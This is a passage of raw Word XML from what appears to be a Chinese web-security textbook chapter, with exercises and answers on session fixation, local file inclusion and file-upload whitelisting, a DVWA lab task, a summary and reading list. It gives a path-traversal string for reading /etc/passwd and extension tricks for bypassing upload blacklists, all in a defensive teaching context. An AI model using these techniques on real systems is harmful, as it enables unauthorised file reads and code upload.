        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行认证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答：会话固定攻击的核心在于应用在用户认证前后未更换会话标识。攻击者先获取一个合法的会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（例如应用直接分配到浏览器的匿名会话），然后通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS、网络嗅探或社会工程等方式将该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">植入受害者的浏览器。当受害者使用这个已知的会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完成登录后，服务器仍然将该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与已验证的身份关联，而攻击者持有的同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也被自动提升为已认证会话。一旦登录完成，认证后更换会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的策略会废弃旧的标识并颁发新标识，攻击者所掌握的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随之失效，无法再访问受保护资源，从而从根本上切断攻击链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2：LFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞读取文件的根本原因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">问题：本地文件包含（LFI）能读取服务器上任意文件的底层成因是什么？蓝队可以采取哪两项最关键的代码级防御手段？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：考虑文件包含函数的路径拼接行为，以及攻击者如何通过“..”序列突破预期目录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答：LFI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能够读取任意文件的根本原因在于应用将用户可控的参数直接传递给文件包含或文件读取函数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">require</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file_get_contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），并拼接到文件路径中，而未对输入进行充分的校验与净化。攻击者通过注入路径遍历字符（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）将解析后的路径从预期的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录逃逸至系统敏感目录，从而读取任意文件内容。最关键的代码级防御手段是：其一，将用户输入转变为间接选择（如索引值），使用白名单映射到允许的文件，彻底消除路径拼接；其二，在无法避免拼接的场景下，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">realpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等函数规范化路径，然后检查结果路径是否以允许的基目录为前缀，若否则拒绝访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3：文件上传白名单优于黑名单的原因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">问题：在文件上传校验中，为何基于白名单（允许特定扩展名）的策略比基于黑名单（禁止特定扩展名）的策略更为安全？举出一种常见的黑名单绕过方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：考虑黑名单必须枚举所有“可能危险”的扩展名，以及运行环境的多样性和配置变化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答：白名单策略仅允许明确安全的文件类型（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.jpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）通过，而黑名单试图阻止所有已知的危险扩展名。黑名单的脆弱性在于，攻击者总能找到不在黑名单中的可执行扩展名（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.phtml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.shtml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在某些服务器配置下会作为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本执行），或者利用服务器配置在特定目录中允许的未知扩展名。此外，大小写变化（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.Php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、双扩展名（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、以及利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的多扩展名解析顺序等，都可能使黑名单失效。白名单不需要穷举所有危险类型，只需要维护一个小而精确的安全集合，因此在维护和安全性上都更具优势。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请读者在已搭建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境中完成以下操作，巩固本章防御知识：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在“Brute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Force”模块，分别尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">难度，体验无防护和有速率限制时的爆破行为，然后在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置中将安全等级调至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">High，观察令牌机制如何进一步阻止自动化攻击。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在“File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Inclusion”模块，利用路径遍历成功读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件（或查阅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手册），尝试通过更改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置并重启服务来阻断包含；注意在实验室快照状态下操作，以避免影响其他实验。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在“File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload”模块，上传一个无害的测试文件，然后根据本节所述白名单策略，自行修改后端代码（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）实施扩展名白名单和随机文件名重命名，验证上传绕过是否变得不可能。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有操作均须在隔离实验室进行，禁止对任何非授权目标使用所述技术。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证与会话类漏洞的本质是系统对客户端提供的身份断言或令牌给予过度信任，纵深防御要求从口令强度、会话生命周期、输入输出隔离等多环节降低信任假设。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份平面的防御核心是“强口令+MFA+速率限制+账户锁定”，其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MFA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">显著提高攻击成本，但须与反钓鱼机制结合；速率限制须在服务端实施，不可依赖客户端逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话安全管理的关键操作是“登录后轮换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID”以及充分使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性，JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全须强制验证签名与声明，并禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg=none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LFI/RFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的根本防御在于避免将用户输入直接作为文件路径，优先使用白名单映射，必要时辅以路径规范化+基目录前缀校验；同时应禁用远程文件包含以避免</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传安全的金规则是“白名单扩展名+内容验证+随机文件名+存储隔离+执行权限禁用”，黑名单因其漏报倾向而不可作为唯一防线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队必须将各层日志汇聚至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM，建立针对爆破风暴、异常会话跳转、敏感路径访问和脚本目录文件写入的检测规则，WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅为辅助措施，不应被误认为根治方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stuttard, D. &amp; Pinto, M.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书对认证、会话管理、文件包含与上传等主题有详尽的实际案例和防御建议，建议结合本章实验进行对照阅读。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing Guide (v4/v5) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中“Authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing”与“Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing”章节，提供了系统化的测试清单与风险判定指引。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Authentication、File Upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Directory Traversal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等实验模块，可帮助读者在交互式环境中进一步巩固攻击与防御技能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Top 10:2021 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A07: Identification and Authentication </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Failures，以及与文件上传相关的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05: Security Misconfiguration、A03: Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等条目，提供了面向风险评估的高层地图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1127"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于纵深防御体系构建感兴趣的读者，可进一步参考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800-63 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列的数字身份指南和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CIS Benchmarks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中关于文件系统和应用安全配置的基线推荐。</w:t>
